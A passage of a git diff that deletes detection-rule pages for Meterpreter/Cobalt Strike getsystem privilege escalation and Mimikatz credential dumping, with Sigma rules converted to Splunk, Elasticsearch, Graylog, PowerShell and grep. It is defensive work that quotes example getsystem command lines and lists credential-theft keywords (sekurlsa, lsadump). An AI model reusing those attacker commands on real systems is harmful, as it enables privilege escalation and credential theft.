-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Meterpreter or Cobalt Strike Getsystem Service Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}\n  ServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/843544a7-56e0-4dcc-a44f-5cc266dd97d6-2 <<EOF
-{
-  "metadata": {
-    "title": "Meterpreter or Cobalt Strike Getsystem Service Installation",
-    "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1134"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Meterpreter or Cobalt Strike Getsystem Service Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}\n  ServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/843544a7-56e0-4dcc-a44f-5cc266dd97d6-3 <<EOF
-{
-  "metadata": {
-    "title": "Meterpreter or Cobalt Strike Getsystem Service Installation",
-    "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1134"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Meterpreter or Cobalt Strike Getsystem Service Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}\n  ServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ((ServiceFileName.keyword:*cmd* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*%COMSPEC%* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*rundll32* AND ServiceFileName.keyword:*.dll,a* AND ServiceFileName.keyword:*\/p\:*)))
-(EventID:"6" AND ((ServiceFileName.keyword:*cmd* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*%COMSPEC%* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*rundll32* AND ServiceFileName.keyword:*.dll,a* AND ServiceFileName.keyword:*\/p\:*)))
-(EventID:"4697" AND ((ServiceFileName.keyword:*cmd* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*%COMSPEC%* AND ServiceFileName.keyword:*\/c* AND ServiceFileName.keyword:*echo* AND ServiceFileName.keyword:*\\pipe\\*) OR (ServiceFileName.keyword:*rundll32* AND ServiceFileName.keyword:*.dll,a* AND ServiceFileName.keyword:*\/p\:*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*"))) | table ComputerName,SubjectDomainName,SubjectUserName,ServiceFileName
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="6" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*"))) | table ComputerName,SubjectDomainName,SubjectUserName,ServiceFileName
-(source="WinEventLog:Security" EventCode="4697" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*"))) | table ComputerName,SubjectDomainName,SubjectUserName,ServiceFileName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*")))
-(event_id="6" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*")))
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4697" ((ServiceFileName="*cmd*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*%COMSPEC%*" ServiceFileName="*/c*" ServiceFileName="*echo*" ServiceFileName="*\\pipe\\*") OR (ServiceFileName="*rundll32*" ServiceFileName="*.dll,a*" ServiceFileName="*/p:*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*(?:.*(?:.*(?:.*(?=.*.*cmd.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*%COMSPEC%.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*rundll32.*)(?=.*.*\.dll,a.*)(?=.*.*/p:.*))))))'
-grep -P '^(?:.*(?=.*6)(?=.*(?:.*(?:.*(?:.*(?=.*.*cmd.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*%COMSPEC%.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*rundll32.*)(?=.*.*\.dll,a.*)(?=.*.*/p:.*))))))'
-grep -P '^(?:.*(?=.*4697)(?=.*(?:.*(?:.*(?:.*(?=.*.*cmd.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*%COMSPEC%.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*rundll32.*)(?=.*.*\.dll,a.*)(?=.*.*/p:.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_start.md b/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_start.md
deleted file mode 100644
index 5301040..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_start.md
+++ /dev/null
@@ -1,198 +0,0 @@
-| Title                    | Meterpreter or Cobalt Strike Getsystem Service Start       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1134: Access Token Manipulation](https://attack.mitre.org/techniques/T1134)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Commandlines containing components like cmd accidentally</li><li>Jobs and services started with cmd</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li><li>[https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/](https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Ecco |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Meterpreter or Cobalt Strike Getsystem Service Start
-id: 15619216-e993-4721-b590-4c520615a67d
-description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
-author: Teymur Kheirkhabarov, Ecco
-date: 2019/10/26
-modified: 2020/05/15
-references:
-    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
-    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
-tags:
-    - attack.privilege_escalation
-    - attack.t1134
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        ParentImage|endswith: '\services.exe'
-    selection_2:    
-        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
-        - CommandLine|contains|all:
-            - 'cmd'
-            - '/c'
-            - 'echo'
-            - '\pipe\'
-        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
-        - CommandLine|contains|all:
-            - '%COMSPEC%'
-            - '/c'
-            - 'echo'
-            - '\pipe\'
-        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
-        - CommandLine|contains|all:
-            - 'rundll32'
-            - '.dll,a'
-            - '/p:'
-    filter1:
-        CommandLine|contains: 'MpCmdRun'
-    condition: selection_1 and selection_2 and not filter1
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Commandlines containing components like cmd accidentally
-    - Jobs and services started with cmd
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\services.exe" -and (($_.message -match "CommandLine.*.*cmd.*" -and $_.message -match "CommandLine.*.*/c.*" -and $_.message -match "CommandLine.*.*echo.*" -and $_.message -match "CommandLine.*.*\\pipe\\.*") -or ($_.message -match "CommandLine.*.*%COMSPEC%.*" -and $_.message -match "CommandLine.*.*/c.*" -and $_.message -match "CommandLine.*.*echo.*" -and $_.message -match "CommandLine.*.*\\pipe\\.*") -or ($_.message -match "CommandLine.*.*rundll32.*" -and $_.message -match "CommandLine.*.*.dll,a.*" -and $_.message -match "CommandLine.*.*/p:.*"))) -and  -not ($_.message -match "CommandLine.*.*MpCmdRun.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:*\\services.exe AND ((winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\pipe\\*) OR (winlog.event_data.CommandLine.keyword:*%COMSPEC%* AND winlog.event_data.CommandLine.keyword:*\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\pipe\\*) OR (winlog.event_data.CommandLine.keyword:*rundll32* AND winlog.event_data.CommandLine.keyword:*.dll,a* AND winlog.event_data.CommandLine.keyword:*\/p\:*))) AND (NOT (winlog.event_data.CommandLine.keyword:*MpCmdRun*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/15619216-e993-4721-b590-4c520615a67d <<EOF
-{
-  "metadata": {
-    "title": "Meterpreter or Cobalt Strike Getsystem Service Start",
-    "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1134"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:*\\\\services.exe AND ((winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.CommandLine.keyword:*%COMSPEC%* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.CommandLine.keyword:*rundll32* AND winlog.event_data.CommandLine.keyword:*.dll,a* AND winlog.event_data.CommandLine.keyword:*\\/p\\:*))) AND (NOT (winlog.event_data.CommandLine.keyword:*MpCmdRun*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:*\\\\services.exe AND ((winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.CommandLine.keyword:*%COMSPEC%* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*echo* AND winlog.event_data.CommandLine.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.CommandLine.keyword:*rundll32* AND winlog.event_data.CommandLine.keyword:*.dll,a* AND winlog.event_data.CommandLine.keyword:*\\/p\\:*))) AND (NOT (winlog.event_data.CommandLine.keyword:*MpCmdRun*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Meterpreter or Cobalt Strike Getsystem Service Start'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:*\\services.exe AND ((CommandLine.keyword:*cmd* AND CommandLine.keyword:*\/c* AND CommandLine.keyword:*echo* AND CommandLine.keyword:*\\pipe\\*) OR (CommandLine.keyword:*%COMSPEC%* AND CommandLine.keyword:*\/c* AND CommandLine.keyword:*echo* AND CommandLine.keyword:*\\pipe\\*) OR (CommandLine.keyword:*rundll32* AND CommandLine.keyword:*.dll,a* AND CommandLine.keyword:*\/p\:*))) AND (NOT (CommandLine.keyword:*MpCmdRun*)))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\services.exe" ((CommandLine="*cmd*" CommandLine="*/c*" CommandLine="*echo*" CommandLine="*\\pipe\\*") OR (CommandLine="*%COMSPEC%*" CommandLine="*/c*" CommandLine="*echo*" CommandLine="*\\pipe\\*") OR (CommandLine="*rundll32*" CommandLine="*.dll,a*" CommandLine="*/p:*"))) NOT (CommandLine="*MpCmdRun*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage="*\\services.exe" ((CommandLine="*cmd*" CommandLine="*/c*" CommandLine="*echo*" CommandLine="*\\pipe\\*") OR (CommandLine="*%COMSPEC%*" CommandLine="*/c*" CommandLine="*echo*" CommandLine="*\\pipe\\*") OR (CommandLine="*rundll32*" CommandLine="*.dll,a*" CommandLine="*/p:*")))  -(CommandLine="*MpCmdRun*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\services\.exe)(?=.*(?:.*(?:.*(?:.*(?=.*.*cmd.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*%COMSPEC%.*)(?=.*.*/c.*)(?=.*.*echo.*)(?=.*.*\pipe\\.*))|.*(?:.*(?=.*.*rundll32.*)(?=.*.*\.dll,a.*)(?=.*.*/p:.*)))))))(?=.*(?!.*(?:.*(?=.*.*MpCmdRun.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mimikatz_command_line.md b/Atomic_Threat_Coverage/Detection_Rules/win_mimikatz_command_line.md
deleted file mode 100644
index 852f1f0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mimikatz_command_line.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | Mimikatz Command Line       |
-|:-------------------------|:------------------|
-| **Description**          | Detection well-known mimikatz command line arguments |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate Administrator using tool for password recovery</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.004</li><li>attack.t1003.001</li><li>attack.t1003.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Mimikatz Command Line
-id: a642964e-bead-4bed-8910-1bb4d63e3b4d
-description: Detection well-known mimikatz command line arguments
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.004
-    - attack.t1003.001
-    - attack.t1003.006
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        CommandLine|contains:
-            - DumpCreds
-            - invoke-mimikatz
-    selection_2:
-        CommandLine|contains:
-            - rpc
-            - token
-            - crypto
-            - dpapi
-            - sekurlsa
-            - kerberos
-            - lsadump
-            - privilege
-            - process
-    selection_3:
-        CommandLine|contains:
-            - '::'
-    condition: selection_1 or selection_2 and selection_3
-falsepositives:
-    - Legitimate Administrator using tool for password recovery
-level: medium
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*DumpCreds.*" -or $_.message -match "CommandLine.*.*invoke-mimikatz.*") -or (($_.message -match "CommandLine.*.*rpc.*" -or $_.message -match "CommandLine.*.*token.*" -or $_.message -match "CommandLine.*.*crypto.*" -or $_.message -match "CommandLine.*.*dpapi.*" -or $_.message -match "CommandLine.*.*sekurlsa.*" -or $_.message -match "CommandLine.*.*kerberos.*" -or $_.message -match "CommandLine.*.*lsadump.*" -or $_.message -match "CommandLine.*.*privilege.*" -or $_.message -match "CommandLine.*.*process.*") -and ($_.message -match "CommandLine.*.*::.*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*DumpCreds* OR *invoke\-mimikatz*) OR (winlog.event_data.CommandLine.keyword:(*rpc* OR *token* OR *crypto* OR *dpapi* OR *sekurlsa* OR *kerberos* OR *lsadump* OR *privilege* OR *process*) AND winlog.event_data.CommandLine.keyword:(*\:\:*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a642964e-bead-4bed-8910-1bb4d63e3b4d <<EOF
-{
-  "metadata": {
-    "title": "Mimikatz Command Line",
-    "description": "Detection well-known mimikatz command line arguments",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.004",
-      "attack.t1003.001",
-      "attack.t1003.006"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*DumpCreds* OR *invoke\\-mimikatz*) OR (winlog.event_data.CommandLine.keyword:(*rpc* OR *token* OR *crypto* OR *dpapi* OR *sekurlsa* OR *kerberos* OR *lsadump* OR *privilege* OR *process*) AND winlog.event_data.CommandLine.keyword:(*\\:\\:*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*DumpCreds* OR *invoke\\-mimikatz*) OR (winlog.event_data.CommandLine.keyword:(*rpc* OR *token* OR *crypto* OR *dpapi* OR *sekurlsa* OR *kerberos* OR *lsadump* OR *privilege* OR *process*) AND winlog.event_data.CommandLine.keyword:(*\\:\\:*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Mimikatz Command Line'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*DumpCreds* *invoke\-mimikatz*) OR (CommandLine.keyword:(*rpc* *token* *crypto* *dpapi* *sekurlsa* *kerberos* *lsadump* *privilege* *process*) AND CommandLine.keyword:(*\:\:*)))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*DumpCreds*" OR CommandLine="*invoke-mimikatz*") OR ((CommandLine="*rpc*" OR CommandLine="*token*" OR CommandLine="*crypto*" OR CommandLine="*dpapi*" OR CommandLine="*sekurlsa*" OR CommandLine="*kerberos*" OR CommandLine="*lsadump*" OR CommandLine="*privilege*" OR CommandLine="*process*") (CommandLine="*::*")))
-```
-
-
-### logpoint
-    
-```
